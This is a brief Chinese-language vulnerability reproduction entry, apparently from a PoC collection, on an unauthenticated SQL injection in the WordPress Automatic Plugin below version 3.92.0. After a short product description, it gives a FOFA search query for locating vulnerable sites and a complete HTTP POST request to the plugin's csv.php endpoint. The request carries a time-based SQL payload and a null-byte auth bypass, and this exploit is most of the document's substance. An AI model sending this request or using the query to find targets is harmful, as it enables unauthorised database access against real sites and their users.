0x01 产品简介
WordPress Automatic Plugin是一款功能强大的WordPress插件,旨在帮助用户自动采集并发布内容。这款插件支持从各种来源自动采集内容,包括但不限于RSS源、网站、YouTube、eBay等。用户可以根据自己的需求设置采集规则,选择要采集的内容类型、关键词、发布时间等。一旦设置完成,插件会自动按照规则定时采集内容,并发布到WordPress网站上。
0x02 漏洞概述
WordPress Automatic Plugin 小于 3.92.0 的版本存在SQL注入漏洞,未授权的攻击者可以通过该漏洞获取数据库敏感信息。
0x03 测绘语句
fofa: body="/wp-content/plugins/wp-automatic"
0x04 漏洞复现
漏洞复现:
POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
q=SELECT IF(1=1,sleep(5),sleep(0));&auth=%00&integ=dc9b923a00f0e449c3b401fb0d7e2fae